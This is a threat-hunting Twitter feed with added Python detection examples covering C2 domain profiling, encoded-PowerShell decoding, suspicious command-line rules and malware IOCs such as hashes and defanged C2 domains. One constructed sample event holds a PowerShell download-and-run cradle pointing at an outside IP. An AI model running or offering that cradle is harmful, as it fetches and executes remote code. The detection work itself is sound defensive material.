Tweets by @blu3_team

Pinned tweet
Another method of C2 detection using Splunk with rare domain and PC counts. https://blu3-team.blogspot.com/2019/05/detecting-c2-using-splunk.html pic.twitter.com/Jkelpcpg3E
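The pinned tweet names the idea (count distinct machines per destination domain and look at the rare ones) but the logic lives in the linked post. As an added example that is not from the tweet or the blog, here is the same profiling in Python over constructed proxy-log records rather than in Splunk SPL; the host names, domains, thresholds and the function names profile_domains / rare_domain_hits are all my own assumptions.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

Record = Tuple[str, str]  # (source host, destination domain)


def profile_domains(records: Iterable[Record]) -> Dict[str, Tuple[int, int]]:
    """Map each domain to (number of distinct hosts, total requests)."""
    hosts: Dict[str, set] = defaultdict(set)
    requests: Dict[str, int] = defaultdict(int)
    for host, domain in records:
        hosts[domain].add(host)
        requests[domain] += 1
    return {d: (len(hosts[d]), requests[d]) for d in requests}


def rare_domain_hits(records: Iterable[Record], max_hosts: int = 2,
                     min_requests: int = 20) -> List[Tuple[str, int, int]]:
    """Domains reached from at most max_hosts machines yet at least min_requests times.

    A domain the whole fleet talks to is almost never C2; one that a single
    machine hits dozens of times is worth a look. Both thresholds are tuning
    knobs for the environment, not fixed values.
    """
    profile = profile_domains(records)
    hits = [(domain, n_hosts, n_req) for domain, (n_hosts, n_req) in profile.items()
            if n_hosts <= max_hosts and n_req >= min_requests]
    # Fewest hosts first, then most requests.
    return sorted(hits, key=lambda h: (h[1], -h[2]))


# Constructed proxy-log records (not from the original page).
SAMPLE_LOG: List[Record] = (
    [(f"WS-{i:02d}", "update.example-vendor.test") for i in range(1, 41)]  # fleet-wide, benign
    + [(f"WS-{i:02d}", "cdn.example-news.test") for i in range(1, 26)]     # common, benign
    + [("WS-07", "a3f9.sync-cdn.test")] * 48                               # one host, many hits
    + [("WS-12", "fonts.example.test"), ("WS-13", "fonts.example.test")]  # rare but quiet
    + [("WS-19", "newsletter.example.test")] * 2                          # rare but quiet
)


if __name__ == "__main__":
    for domain, n_hosts, n_req in rare_domain_hits(SAMPLE_LOG):
        print(f"{domain}: {n_hosts} host(s), {n_req} requests")
```

The two thresholds do different jobs: max_hosts filters out anything the fleet uses, min_requests filters out one-off browsing, and what is left is the short list a human reviews. Lowering min_requests to 2 on the sample data also surfaces the two quiet rare domains, which is usually too noisy for a real proxy log.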
Powershell -encodedcommand decoding with Splunk Decrypt App AKA: How to get rid of the pesky periods in the base64_decode https://blu3-team.blogspot.com/2019/11/advanced-powershell-hunting-with-splunk.html #Threathunting
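As an added example (not code from the tweet or the linked post), the decode in Python rather than in the Splunk Decrypt App. powershell.exe takes -EncodedCommand (or any unambiguous prefix such as -e or -enc) as base64 of the script encoded in UTF-16LE, so a plain base64 decode yields a null byte after every ASCII character; my assumption is that those nulls, rendered as dots, are the "pesky periods" the tweet refers to, and decoding as UTF-16LE is what removes them. The sample command lines are constructed, and the names encode_powershell, find_encoded_token, naive_decode, decode_encoded_command and hunt are my own.

```python
import base64
import re
from typing import List, Optional, Tuple

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...) in any letter case, and the argument is base64 of the script
# encoded as UTF-16LE. Capture the flag and the base64 token that follows it.
ENCODED_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand argument exactly as powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def find_encoded_token(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand (or a prefix form), else None."""
    for match in ENCODED_FLAG.finditer(cmdline):
        flag = match.group(1).lower()
        # -ExecutionPolicy / -ep also start with 'e'; only prefixes of
        # 'encodedcommand' are the real thing.
        if "encodedcommand".startswith(flag):
            return match.group(2)
    return None


def naive_decode(token: str) -> str:
    """Plain base64 decode rendered as text: the UTF-16LE null bytes show up as '.'."""
    raw = base64.b64decode(token)
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the encoded script from a command line, or None if there is none."""
    token = find_encoded_token(cmdline)
    if token is None:
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Bad padding, non-base64 characters or an odd byte count: either not
        # a real encoded command or a command line truncated by the log source.
        return None


# Constructed process command lines (not taken from the original page).
SAMPLE_EVENTS: List[str] = [
    "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
    "powershell -e " + encode_powershell("Get-Process | Out-Null"),
    "cmd.exe /c echo done",
]


def hunt(events: List[str]) -> List[Tuple[str, str]]:
    """Return (command line, decoded script) for every event carrying an encoded command."""
    hits = []
    for cmdline in events:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            hits.append((cmdline, decoded))
    return hits


if __name__ == "__main__":
    for cmdline, script in hunt(SAMPLE_EVENTS):
        print(naive_decode(find_encoded_token(cmdline))[:24], "...")  # the 'pesky periods'
        print(script)
```

Two points worth carrying back into whatever search language you use: match the flag by prefix rather than by the literal string -EncodedCommand, because -e and -enc are what appears in practice, and treat a token that fails to decode as its own finding rather than discarding it, since a command line clipped by the log source is common and still tells you an encoded command ran.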
Nice, turns out Scr files generally have a manageable list of parents. https://blu3-team.blogspot.com/2019/10/scr-from-unusual-parent.html #threathunting https://twitter.com/Timele9527/status/1186816375857139712
Detecting #Adwind using clustered child processes of java.exe. Kudos to @anyrun_app for making #threathunting easier! https://blu3-team.blogspot.com/2019/10/detecting-adwind-using-clustered-child.html https://app.any.run/tasks/455f13a6-c615-4969-bbfb-50967760b158/
Using Splunk to detect wmiprvse.exe as parent in close proximity to Winword.exe startup. #ursnif #threathunting https://blu3-team.blogspot.com/2019/10/detect-wmiprvseexe-as-parent-in-close.html https://app.any.run/tasks/e2cc76c0-0551-496f-8830-65b4a5de6077/
Using pfSense to selectively allow traffic during dynamic malware analysis. Had fun setting this up so I thought I would share the process. https://blu3-team.blogspot.com/2019/09/using-pfsense-to-selectively-allow.html
#Trickbot installation. Command line looking for "findstr" and "lnk" might be a good early indicator. https://app.any.run/tasks/42653bc4-98f6-4f21-9537-37cdd82fb8b5/ pic.twitter.com/MrLuljAmSj
Some methods for profiling scheduled tasks. #threathunting https://blu3-team.blogspot.com/2019/07/profiling-scheduled-tasks.html
@blu3_team retweeted:
PB&J. Wine and cheese. Some pairs just go together but others don't. Which is why today on the blog we're talking all about how to find anomalous pairs during threat hunting. Take 6 min to read our tips on how to find these in your environment: http://bit.ly/2LdnTnU pic.twitter.com/LASElcT8NL
A couple of sigs for some file extension shenanigans. Nothing new, but you might want to check to see if you have them. https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html #threathunting @cyb3rops pic.twitter.com/CRWIibgn4g
Seeing some adware trying to overwrite the zone.identifier. Command lines containing cmd echo zone.identifier should find it. #threathunting pic.twitter.com/40vIeYv9pU
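Three of the tweets above are command-line hunts: the Trickbot one (findstr together with lnk), the misleading-extension sigs (.doc.exe, .xls.exe and the like) and this zone.identifier one (echo writing into the Zone.Identifier stream). As an added example that is not from the tweets, the linked post or the sigs themselves, here are all three as predicates run over constructed Sysmon-style process-creation events; the event contents, the rule names and the extension lists in the regexes are my own assumptions, and the Trickbot rule does no more than the tweet says (both tokens present).

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Document-style extension immediately followed by an executable extension,
# e.g. invoice.doc.exe, at the end of a path or before a closing quote/space.
DOUBLE_EXT = re.compile(
    r"\.(?:doc|docx|xls|xlsx|ppt|pptx|pdf|txt|jpg|png)"
    r"\.(?:exe|scr|com|pif|bat|cmd|js|vbs)(?=[\"\s]|$)",
    re.IGNORECASE,
)
# 'echo ... :Zone.Identifier' rewrites the mark-of-the-web alternate data stream.
ZONE_ID_ECHO = re.compile(r"\becho\b.*zone\.identifier", re.IGNORECASE)
LNK = re.compile(r"\.lnk\b", re.IGNORECASE)

RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("findstr_with_lnk",
     lambda e: "findstr" in e["cmdline"].lower() and LNK.search(e["cmdline"]) is not None),
    ("misleading_double_extension",
     lambda e: DOUBLE_EXT.search(e["image"]) is not None
     or DOUBLE_EXT.search(e["cmdline"]) is not None),
    ("zone_identifier_overwrite",
     lambda e: ZONE_ID_ECHO.search(e["cmdline"]) is not None),
]

# Constructed Sysmon-style process-creation events (not from the original page).
SAMPLE_EVENTS: List[Event] = [
    {"id": "1", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c findstr /i "abc" C:\Users\bob\AppData\Roaming\*.lnk'},
    {"id": "2", "image": r"C:\Users\bob\Downloads\invoice.doc.exe",
     "cmdline": r'"C:\Users\bob\Downloads\invoice.doc.exe"'},
    {"id": "3", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c echo [ZoneTransfer] > C:\Users\bob\AppData\Local\Temp\setup.exe:Zone.Identifier"},
    {"id": "4", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c findstr /c:"error" C:\logs\app.log'},
    {"id": "5", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n report.docx'},
]


def hunt(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (event id, rule name) for every rule that fires on an event."""
    hits = []
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits.append((event["id"], name))
    return hits


if __name__ == "__main__":
    for event_id, rule in hunt(SAMPLE_EVENTS):
        print(event_id, rule)
```

Event 4 (findstr against a log file) and event 5 (Word opening a .docx) are there as the benign neighbours each rule has to leave alone; the double-extension regex anchors on a quote, whitespace or end of string so that report.docx or setup.exe:Zone.Identifier does not trip it, and the zone rule requires echo so that merely reading the stream (type, Get-Content) is not flagged.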
8.t
#Malware 78965.doc 10348b56b0e3466f9f9fa62bda081c98 QCRat C2: login\.vietnamairlines1\.com pic.twitter.com/nLrsQQFmd4
Google's search leaves users in the dark: DuckDuckGo CEO https://finance.yahoo.com/news/googles-search-leaves-users-dark-duckduck-go-ceo-214438103.html?soc_src=community&soc_trk=tw via @YahooFinance
#Malware Danh sách BQP dự họp TTg.doc (List of participants of the meeting) a48431970d150d977562c892c6c124cb OSE.EXE 86a0557fc47d79ad1cc056f229dab944 unio.exe (legit) LBTServ.dll 5767a17038ca8003ee3e806c5c64b2da k1.ini C2: goog1eupdate\.com pic.twitter.com/94UiOGxA1r
#Malware 61c22d7612299e5838fc62f2b7f50a33efdbb1bc.rtf 0ee22eb0612a4e44c0425d1d9d978056 Drops ose.exe 596fb3f3d6f5a8d1a1fa8f6bd428e56b. Anti-VM: tries to resolve www\.oprojectllheokdetectedmaliciouscode\.com; resolution must fail to get the C2: mx.rec.dnsabr\.com pic.twitter.com/lc5ZbTCfll
@_jsoo_ noted that this is an older sample, my bad. The components are still in place so it still works.
#Malware Persecution Cases.docx.lnk a63b22171593d78109c38f0a405f6e60 Delivery from www\.geocities\.jp C2: web\.adobephotostage\.com pic.twitter.com/P9EAPpFoQc
#Malware 4116054684711436178.rtf 58ab2781a59767cc36198de474df7dc3 C2: 185.200.116\.181 drops mshtml.dll 96df4162f5c3439ea7cb7bd5e2097dae config.dat takshosts.exe c9279ab390d7431a27da3463de0e9b16 update.exe ff89261094e69e8282dbfc974466fb07 pic.twitter.com/dkuTYouAmP